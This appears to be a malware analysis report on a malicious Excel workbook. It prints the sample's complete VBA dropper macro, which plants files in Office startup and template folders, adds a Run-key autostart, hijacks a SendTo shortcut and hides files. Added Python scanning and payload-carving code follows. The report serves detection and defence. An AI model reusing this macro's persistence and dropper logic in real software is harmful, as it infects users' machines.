Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0ac78685e9224f58…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 286.5 KB
Created: 2012-07-11 08:11:21
Authoring application: Microsoft Excel
First seen: 2015-09-30

MD5: a27399d5c7b6af4ab261ea52d3cb5fd6
SHA-1: 98b91d50a8e34d107d71d8a82838d77d1963a573
SHA-256: 0ac78685e9224f58cb68327b9ffa98af42ace96fdd5207e55a26aaff9a45dec1

Risk score: 160

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File
Also observed in the extracted macro but not tagged by the engine: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder (the HKCU\...\CurrentVersion\Run write) and T1137.001 Office Application Startup: Office Template Macros (files planted in the Excel startup folder and in Word's Normal template directory).

The sample's only module, Module1, holds a single routine, createcabfile, that uses Scripting.FileSystemObject and WScript.Shell (the CreateObject calls flagged below) to drop and install a payload that is embedded in the workbook itself. Nothing is fetched from the network, so this is a self-contained dropper rather than a downloader.

The payload is stored as data: rows 1 to 150 of column B on the sheet "(m1)_(m2)_(m3)" hold space-separated decimal byte values, which the macro writes byte by byte to c:\cab.cab and then expands into c:\ with extrac32 (falling back to extract). From the expanded files it copies c:\normal.dot into the user's Templates folder and into Word's Normal template directory, copies c:\norma1.xlm into the Excel startup folder (Application.StartupPath, i.e. XLSTART) and re-injects the encoded column into that copy, copies c:\internet.exe into the system folder (GetSpecialFolder(1)), repoints the floppy-disk shortcut (the SendTo entry whose name contains "软盘", "floppy disk") at c:\sendto.exe, and writes an HKCU\Software\Microsoft\Windows\CurrentVersion\Run value for internet.exe while removing an older Internat.exe value. setflag.exe and sendto.exe are unhidden for the update and re-hidden with attrib +s +h afterwards, and the staging files in c:\ are deleted. If norma1.xlm is already open the routine skips straight to cleanup; if it is already present in the startup folder only the drop stage is skipped and the column is still re-injected. Finally it deletes every sheet whose name begins with "模块表" ("module sheet") with alerts suppressed and marks the workbook as saved so the changes do not trigger a save prompt. On Error Resume Next masks every failure, including the call to the non-existent fso.Delete method, so the chain keeps going on hosts where individual steps do not work.

Heuristics (4)

  • VBA macros detected [medium] (OLE_VBA_MACROS, 2 related findings)
    Document contains VBA macro code
  • WScript.Shell usage [critical] (OLE_VBA_WSCRIPT)
    Matched line in script: Set w = CreateObject("wscript.shell")
  • CreateObject call [high] (OLE_VBA_CREATEOBJ)
    Matched line in script: Set fso = CreateObject("scripting.filesystemobject")
  • Reference to Windows Script Host [high] (SC_STR_WSCRIPT)
    String-level match for Windows Script Host (WScript) in the sample
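Heuristics of this kind are just line-level pattern matches over the decoded VBA, which is why an analyst still needs to read the module to tell a dropper from a downloader. The following Python is an added example for this report, not the analysis engine's own rules: it scans macro source for the behaviours flagged above plus the persistence and drop actions visible in the extracted module, and reports whether any download indicator is present. Rule IDs prefixed OLE_VBA_ are the report's; the X_ rules, the severity weights and SAMPLE_VBA (a constructed excerpt modelled on the extracted module) are assumptions made for this example.

```python
"""Heuristic triage of decoded VBA source, in the style of the findings above.

Added example for this report, not the analysis engine's rules. OLE_VBA_*
IDs are taken from the report; X_* IDs and the weights are made up here.
"""
import re

RULES = [
    # (rule id, severity, pattern); group 1, when present, is the indicator to extract
    ("OLE_VBA_CREATEOBJ", "high",
     re.compile(r'CreateObject\s*\(\s*"([^"]+)"', re.I)),
    ("OLE_VBA_WSCRIPT", "critical",
     re.compile(r'CreateObject\s*\(\s*"(wscript\.shell)"', re.I)),
    ("X_SHELL_RUN", "critical",          # WScript.Shell.Run of a cmd.exe command line
     re.compile(r'\.Run\s+"([^"]*%COMSPEC%[^"]*)"', re.I)),
    ("X_RUN_KEY", "high",                # RegWrite under a CurrentVersion\Run key
     re.compile(r'\.RegWrite\s+"(HK[^"]*\\CurrentVersion\\Run\\[^"]*)"', re.I)),
    ("X_OFFICE_STARTUP", "high",         # touches Excel startup / Word template folders
     re.compile(r'(Application\.StartupPath|NormalTemplate\.Path|SpecialFolders\("Templates"\))', re.I)),
    ("X_DOWNLOAD", "high",               # common VBA download primitives; absent in this sample
     re.compile(r'(URLDownloadToFile|MSXML2\.XMLHTTP|WinHttp\.WinHttpRequest|https?://)', re.I)),
]
SEVERITY_WEIGHT = {"critical": 50, "high": 30, "medium": 10}   # illustrative, not the report's scoring


def scan(vba_source: str):
    """Return one {rule, severity, line_no, line, indicator} dict per rule hit per line."""
    hits = []
    for no, line in enumerate(vba_source.splitlines(), 1):
        for rule_id, sev, pat in RULES:
            m = pat.search(line)
            if m:
                hits.append({"rule": rule_id, "severity": sev, "line_no": no,
                             "line": line.strip(),
                             "indicator": m.group(1) if m.groups() else ""})
    return hits


def _indicators(hits, rule_id):
    return [h["indicator"] for h in hits if h["rule"] == rule_id]


def triage(vba_source: str) -> dict:
    """Summarise the hits: rules fired, ProgIDs, shell commands, Run keys, download indicators."""
    hits = scan(vba_source)
    return {
        "rules_fired": sorted({h["rule"] for h in hits}),
        "progids": sorted({p.lower() for p in _indicators(hits, "OLE_VBA_CREATEOBJ")}),
        "commands": _indicators(hits, "X_SHELL_RUN"),
        "run_keys": _indicators(hits, "X_RUN_KEY"),
        "downloader_indicators": bool(_indicators(hits, "X_DOWNLOAD")),
        "score": sum(SEVERITY_WEIGHT[h["severity"]] for h in hits),
        "hits": hits,
    }


# Constructed excerpt modelled on the extracted module (not the carved artifact itself).
SAMPLE_VBA = r'''
Set fso = CreateObject("scripting.filesystemobject")
Set w = CreateObject("wscript.shell")
myfolder = w.SpecialFolders("Templates") & "\Software\"
w.Run "%COMSPEC% /c extrac32 /E /Y /L c:\ c:\cab.cab", 0, True
fso.copyfile "c:\norma1.xlm", Application.StartupPath & "\", True
w.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Internet.exe", "internet.exe"
'''

if __name__ == "__main__":
    result = triage(SAMPLE_VBA)
    for h in result["hits"]:
        print(f'{h["rule"]:18} {h["severity"]:8} L{h["line_no"]}: {h["line"]}')
    print("downloader indicators:", result["downloader_indicators"], "score:", result["score"])
```

Run against the excerpt, both CreateObject rules fire on the wscript.shell line (as they do in the report), the extrac32 command and the Run key are pulled out as indicators, and X_DOWNLOAD stays silent, which is the quickest confirmation that the "downloader" label does not fit this macro.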

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2808 bytes
SHA-256: 071361a99a1431d40e0c3041987210a7a2134c5eb423dbe3dcb87fe5192b4347

Extracted script (the preview is capped at 1,000 lines; the 83-line module below is complete)
Attribute VB_Name = "Module1"
Private Sub createcabfile()
Dim ch As Byte
On Error Resume Next
Set fso = CreateObject("scripting.filesystemobject")
Set w = CreateObject("wscript.shell")
myfolder = w.SpecialFolders("Templates") & "\Software\"
If Not fso.folderexists(myfolder) Then
fso.createfolder myfolder
End If
For i = 1 To Workbooks.Count
If Workbooks(i).Name = "normal.xlm" Then
Workbooks(i).Close
fso.deletefile Application.StartupPath & "\normal.xlm"
End If
Next
For i = 1 To Workbooks.Count
If Workbooks(i).Name = "norma1.xlm" Then
GoTo a1
End If
Next
cabfile = "c:\cab.cab"
If Not fso.fileexists(Application.StartupPath & "\norma1.xlm") Then
fso.Delete cabfile
Open cabfile For Binary Access Write As #1
For i = 1 To 150
hv = ThisWorkbook.Sheets("(m1)_(m2)_(m3)").Cells(i, 2).Value
n = 1
m = InStr(hv, " ")
Do While m > 0
ch = CByte(Mid(hv, n, m - n))
Put #1, , ch
n = m + 1
m = InStr(n, hv, " ")
Loop
Next
Close #1
w.Run "%COMSPEC% /c attrib -s -h c:\setflag.exe", 0, True
w.Run "%COMSPEC% /c attrib -s -h c:\sendto.exe", 0, True
w.Run "%COMSPEC% /c extrac32 /E /Y /L c:\ c:\cab.cab", 0, True
w.Run "%COMSPEC% /c extract /E /Y /L c:\ c:\cab.cab", 0, True
fso.deletefile cabfile
fso.copyfile "c:\normal.dot", myfolder, True
Set word = CreateObject("word.application")
ntpath = word.NormalTemplate.Path & "\"
word.Quit
fso.copyfile "c:\normal.dot", ntpath, True
fso.copyfile "c:\norma1.xlm", Application.StartupPath & "\", True
fso.copyfile "c:\internet.exe", fso.getspecialfolder(1) & "\"
Set fold = fso.getfolder(w.SpecialFolders("SendTo"))
For Each ff In fold.Files
If InStr(ff.Name, "软盘") > 0 Then
Set lnk = w.CreateShortcut(fold.Path & "\" & ff.Name)
lnk.TargetPath = "c:\sendto.exe"
lnk.IconLocation = "shell32.dll,6"
lnk.Save
GoTo e2
End If
Next
e2:
fso.deletefile "c:\normal.dot"
fso.deletefile "c:\norma1.xlm"
fso.deletefile "c:\internet.exe"
w.Run "%COMSPEC% /c attrib +s +h c:\setflag.exe", 0, True
w.Run "%COMSPEC% /c attrib +s +h c:\sendto.exe", 0, True
w.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Internet.exe", "internet.exe"
w.regdelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Internat.exe"
End If
Workbooks.Open Application.StartupPath & "\norma1.xlm"
ThisWorkbook.Sheets("(m1)_(m2)_(m3)").Columns(2).Copy Workbooks("norma1.xlm").Sheets("(m1)_(m2)_(m3)").Columns(2)
Workbooks("norma1.xlm").Save
fso.copyfile Application.StartupPath & "\norma1.xlm", myfolder, True
a1:
fso.deletefile "c:\excel.txt"
Application.DisplayAlerts = False
For i = 1 To ThisWorkbook.Sheets.Count
If Left(ThisWorkbook.Sheets(i).Name, 3) = "模块表" Then
ThisWorkbook.Sheets(i).Delete
End If
Next
Application.DisplayAlerts = True
ThisWorkbook.Saved = True
End Sub
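The byte-encoding loop in createcabfile (the For i = 1 To 150 ... Put #1 block) can be reproduced offline to carve the payload from the workbook without letting the macro run. The following Python is an added example for this report, not code from the sample or from the analysis pipeline. It copies the VBA loop's tokenisation exactly, including two quirks: a final token with no space after it is never written, and when CByte fails (empty, non-numeric or out-of-range token) On Error Resume Next leaves the previous ch value in place, so that stale byte is written again. The result is then sanity-checked against the CAB CFHEADER layout. SAMPLE_CELLS is a constructed encoding of a minimal header, not data carved from the sample; to use this on the real file, read column B of the "(m1)_(m2)_(m3)" sheet with a library that handles legacy .xls (for example xlrd) and pass the cell strings to analyse().

```python
r"""Rebuild the archive that createcabfile() writes out from worksheet cells.

Added example for this report; not code from the sample or from the analysis
pipeline. The macro reads rows 1..150 of column B on "(m1)_(m2)_(m3)",
treats each cell as space-separated decimal byte values and appends them
to c:\cab.cab. SAMPLE_CELLS below is constructed, not carved from the sample.
"""
import struct

CAB_MAGIC = b"MSCF"
# CFHEADER: signature, reserved1, cbCabinet, reserved2, coffFiles, reserved3,
# versionMinor, versionMajor, cFolders, cFiles, flags, setID, iCabinet (36 bytes)
CFHEADER = struct.Struct("<4sIIIIIBBHHHHH")


def decode_cell(text: str) -> bytes:
    """Mirror of the macro's inner loop for one cell value.

    The VBA walks InStr(hv, " ") positions and writes CByte(Mid(hv, n, m - n))
    for the text before each space, so a trailing token without a space is
    dropped, and a token CByte rejects leaves the stale ch (initially 0) to be
    written again because of On Error Resume Next.
    """
    out = bytearray()
    ch = 0                      # Dim ch As Byte initialises to 0
    n = 0
    while True:
        m = text.find(" ", n)
        if m < 0:
            break               # no further space: remaining text is never written
        tok = text[n:m]
        n = m + 1
        try:
            val = int(tok)
        except ValueError:
            val = -1            # CByte would raise; keep the stale byte
        if 0 <= val <= 255:     # CByte succeeds only in this range
            ch = val
        out.append(ch)
    return bytes(out)


def rebuild_cab(cells) -> bytes:
    """Concatenate decoded rows in sheet order (rows 1..150 in the macro)."""
    return b"".join(decode_cell(str(c)) for c in cells)


def cab_header(blob: bytes):
    """Parse the fixed CFHEADER fields; None unless the MSCF magic is present."""
    if len(blob) < CFHEADER.size or blob[:4] != CAB_MAGIC:
        return None
    (_, _, cb, _, off, _, vmin, vmaj,
     nfold, nfiles, flags, setid, icab) = CFHEADER.unpack(blob[:CFHEADER.size])
    return {"cbCabinet": cb, "coffFiles": off, "version": f"{vmaj}.{vmin}",
            "cFolders": nfold, "cFiles": nfiles, "flags": flags,
            "setID": setid, "iCabinet": icab,
            "size_matches": cb == len(blob)}   # cbCabinet should equal the carved length


def encode_rows(blob: bytes, per_row: int = 16):
    """Constructed input: store bytes the way the sheet does, each row space-terminated."""
    return ["".join(f"{b} " for b in blob[i:i + per_row])
            for i in range(0, len(blob), per_row)]


def analyse(cells) -> dict:
    """Carve the blob from the cells and report whether it parses as a CAB."""
    blob = rebuild_cab(cells)
    hdr = cab_header(blob)
    return {"size": len(blob), "is_cab": hdr is not None, "header": hdr}


# Constructed sample: a CFHEADER claiming one folder and one file, followed by
# 16 zero bytes so that cbCabinet (52) matches the total length.
SAMPLE_BLOB = CFHEADER.pack(CAB_MAGIC, 0, 52, 0, 36, 0, 3, 1, 1, 1, 0, 0x1234, 0) + b"\x00" * 16
SAMPLE_CELLS = encode_rows(SAMPLE_BLOB)

if __name__ == "__main__":
    print(analyse(SAMPLE_CELLS))
```

Because the decoder reproduces the macro's error handling rather than rejecting bad input, the bytes it produces are the bytes the macro would actually have written to c:\cab.cab, which is what you want before handing the carved archive to a CAB extractor or hashing it for lookup.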